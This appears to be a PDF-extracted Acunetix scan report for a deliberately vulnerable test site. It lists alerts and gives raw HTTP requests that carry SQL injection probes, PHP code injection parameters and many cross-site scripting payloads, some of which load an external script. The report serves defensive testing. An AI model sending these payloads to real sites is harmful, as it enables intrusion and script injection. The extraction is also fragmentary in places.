Acunetix Website Audit 13 October, 2017

Detailed Scan Report

Generated by Acunetix WVS Reporter (v6.0 Build 20081124)

Scan of http://testphp.vulnweb.com:80/ Scan details Scan information Starttime Finish time Scan time Profile

8/21/2017 2:04:33 PM 8/21/2017 2:36:37 PM 32 minutes, 4 seconds default

Server information Responsive Server banner Server OS Server technologies

True nginx/1.4.1 Unknown PHP

Threat level

Alerts distribution Total alerts found High

595 492

Medium

25

Low

25

Informational

53

Knowledge base List of open TCP ports

Acunetix Website Audit

2

DNS server running DNS server running on TCP FTP server running Whois lookup

POP3 server running SSH server running

Acunetix Website Audit

3

List of files with inputs

List of external hosts

Alerts summary Blind SQL/XPath injection Affects /AJAX/infoartist.php /AJAX/infocateg.php /AJAX/infotitle.php /artists.php /listproducts.php /product.php

Acunetix Website Audit

Variations 2 2 2 2 4 2

4

Cross Site Scripting Affects /comment.php /guestbook.php /hpp/ /hpp/params.php /listproducts.php /search.php /secured/newuser.php /showimage.php

Variations 26 105 3 53 42 26 156 46

PHP code injection Affects /comment.php

Variations 2

Proxy accepts CONNECT requests Affects Server

Variations 1

Script source code disclosure Affects /showimage.php

Variations 1

SQL injection Affects /listproducts.php /secured/newuser.php

Variations 14 3

Backup files Affects /index.bak /index.zip

Variations 1 1

Cookie manipulation Affects /comment.php /guestbook.php /hpp/params.php /listproducts.php /search.php /secured/newuser.php /showimage.php

Variations 1 4 2 2 1 5 2

Insecure crossdomain.xml Affects Server

Variations 2

PHPinfo page found Affects /secured/phpinfo.php

Variations 3

Source code disclosure Affects /index.bak

Acunetix Website Audit

Variations 1

5

Application error message Affects /listproducts.php

Variations 4

CVS files found Affects /CVS/Entries /CVS/Repository /CVS/Root

Variations 1 1 1

Directory listing found Affects /admin /CVS /Flash /images /Mod_Rewrite_Shop/images

Variations 1 1 1 1 1

Hidden form input named price was found Affects /product.php

Variations 7

Possible sensitive directories Affects /admin /secured

Variations 1 1

Possible sensitive files Affects /hpp/test.php

Variations 1

URL redirection Affects /redir.php

Variations 1

User credentials are sent in clear text Affects /login.php /signup.php

Variations 1 1

Broken links Affects /Mod_Rewrite_Shop/Details/color-printer/3 /Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1 /Mod_Rewrite_Shop/Details/web-camera-a4tech/2 /privacy.php

Acunetix Website Audit

Variations 1 1 1 1

6

Email address found Affects / /artists.php /cart.php /categories.php /disclaimer.php /guestbook.php /index.bak /index.php /listproducts.php /login.php /logout.php /product.php /search.php /secured/phpinfo.php /signup.php /userinfo.php

Variations 1 4 8 1 1 2 1 1 8 1 1 8 2 1 1 3

GHDB: Default phpinfo page Affects /secured/phpinfo.php

Variations 1

GHDB: phpinfo() Affects /secured/phpinfo.php

Variations 1

Password type input with autocomplete enabled Affects /login.php /signup.php

Acunetix Website Audit

Variations 1 2

7

Alert details Blind SQL/XPath injection Severity High Type Validation Reported by module MultiRequest parameter manipulation Description

Impact

Recommendation

Affected items /AJAX/infoartist.php Details Request GET /AJAX/infoartist.php?id=1+and+31337-31337=0 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:54:24 GMT Content-Type: text/xml Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /AJAX/infoartist.php Details Request GET /AJAX/infoartist.php?id=1+and+31337-31337=0+--+ HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Acunetix Website Audit

8

Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:54:22 GMT Content-Type: text/xml Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /AJAX/infocateg.php Details Request GET /AJAX/infocateg.php?id=1+and+31337-31337=0 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:54:29 GMT Content-Type: text/xml Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /AJAX/infocateg.php Details Request GET /AJAX/infocateg.php?id=1+and+31337-31337=0+--+ HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:54:27 GMT Content-Type: text/xml Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Acunetix Website Audit

9

/AJAX/infotitle.php Details Request POST /AJAX/infotitle.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 26 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm id=1+and+31337-31337=0+--+ Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:54:15 GMT Content-Type: text/xml Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /AJAX/infotitle.php Details Request POST /AJAX/infotitle.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 22 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm id=1+and+31337-31337=0 Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:54:19 GMT Content-Type: text/xml Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /artists.php Details Request GET /artists.php?artist=1+and+31337-31337=0 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Acunetix Website Audit

10

Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:53:08 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /artists.php Details Request GET /artists.php?artist=1+and+31337-31337=0+--+ HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:53:05 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?artist=2+and+31337-31337=0 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:53:35 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details

Acunetix Website Audit

11

Request GET /listproducts.php?artist=2+and+31337-31337=0+--+ HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:53:32 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?cat=1+and+31337-31337=0+--+ HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:53:32 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /listproducts.php Details Request GET /listproducts.php?cat=1+and+31337-31337=0 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:53:35 GMT Content-Type: text/html Connection: close Acunetix Website Audit

12

/product.php Details Request GET /product.php?pic=1+and+31337-31337=0 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:53:47 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /product.php Details Request GET /product.php?pic=1+and+31337-31337=0+--+ HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:53:44 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Cross Site Scripting Severity High Type Validation Reported by module Parameter manipulation Description

Acunetix Website Audit

13

Impact

Recommendation

Affected items /comment.php Details

Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 177 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=&comm [email protected]&Submit=Submit&phpaction=echo%20%24_POST%5Bcomment%5D%3 B Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:58 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /comment.php Details Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 141 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=<%00script>alert(550735971577)%3B[email protected]&Su bmit=Submit&phpaction=echo%20%24_POST%5Bcomment%5D%3B Response HTTP/1.1 200 OK Server: nginx/1.4.1 Acunetix Website Audit

14

Date: Mon, 21 Aug 2017 08:49:58 GMT Content-Type: text/html Connection: close /comment.php Details

Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 163 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%28550775971577%29%3B%22%3E&comment=111-222-19 [email protected]&Submit=Submit&phpaction=echo%20%24_POST%5Bcomment%5D%3B Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:58 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /comment.php Details

Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 170 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=%3Cimg%20src%3D%22JaVaS%26%2399%3BRiPt:alert%28550685971471%29%3B%22%3E&comment=111 [email protected]&Submit=Submit&phpaction=echo%20%24_POST%5Bcomment%5D%3B Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:57 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Acunetix Website Audit

15

/comment.php Details

Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 188 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=[email protected]&Submit=Submit&phpaction=echo%20%24_POST%5Bc omment%5D%3B Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:58 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /comment.php Details Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 153 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=&comment=111-222-1933email@ad dress.tst&Submit=Submit&phpaction=echo%20%24_POST%5Bcomment%5D%3B Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:58 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /comment.php Details

Acunetix Website Audit

16

Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 221 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=[email protected]&Submit=Sub mit&phpaction=echo%20%24_POST%5Bcomment%5D%3B Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:58 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /comment.php Details

Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 171 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=&comment=11 [email protected]&Submit=Submit&phpaction=echo%20%24_POST%5Bcomment%5D%3B Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:58 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /comment.php Details Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Acunetix Website Audit

17

Host: testphp.vulnweb.com Content-Length: 153 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=%00'">alert(550925971656)%3B&comment=111-222-1933email@a Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:58 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /comment.php Details

Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 178 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name="+src="http://testphp.acunetix.com/xss.js?550885971656">&com [email protected]&Submit=Submit&phpaction=echo%20%24_POST%5Bcomment%5D% 3B Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:58 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /comment.php Details

Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 199 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix Website Audit

18

Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=[email protected]&Submit=Submit&phpaction=echo%20 Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:58 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /comment.php Details Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 132 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=[email protected]&Submit=Subm it&phpaction=echo%20%24_POST%5Bcomment%5D%3B Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:58 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /comment.php Details

Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 168 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=&comment=111-2 [email protected]&Submit=Submit&phpaction=echo%20%24_POST%5Bcomment%5D%3B Acunetix Website Audit

19

Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:58 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /comment.php Details Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 159 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=%3C/xss/*-*/style=xss:e/**/xpression(alert(551015971731))%3E&comment=111-222-1933em [email protected]&Submit=Submit&phpaction=echo%20%24_POST%5Bcomment%5D%3B Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:59 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /comment.php Details Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 145 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=[email protected] t&Submit=Submit&phpaction=echo%20%24_POST%5Bcomment%5D%3B Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:50:00 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 Acunetix Website Audit

20

/comment.php Details Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 150 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=>'>alert(550615971471)%3B&comment=111-222-1933email@addre ss.tst&Submit=Submit&phpaction=echo%20%24_POST%5Bcomment%5D%3B Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:57 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /comment.php Details Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 153 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=
alert(550905971656)%3B&comment=111-222-1933email@ad dress.tst&Submit=Submit&phpaction=echo%20%24_POST%5Bcomment%5D%3B Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:58 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /comment.php Details

Request POST /comment.php HTTP/1.0 Acunetix Website Audit

21

Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 172 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=&comment= Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:58 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /comment.php Details Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 153 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=%00"'>alert(550935971656)%3B&comment=111-222-1933email@ad dress.tst&Submit=Submit&phpaction=echo%20%24_POST%5Bcomment%5D%3B Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:59 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /comment.php Details Request POST /comment.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 147 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix Website Audit

22

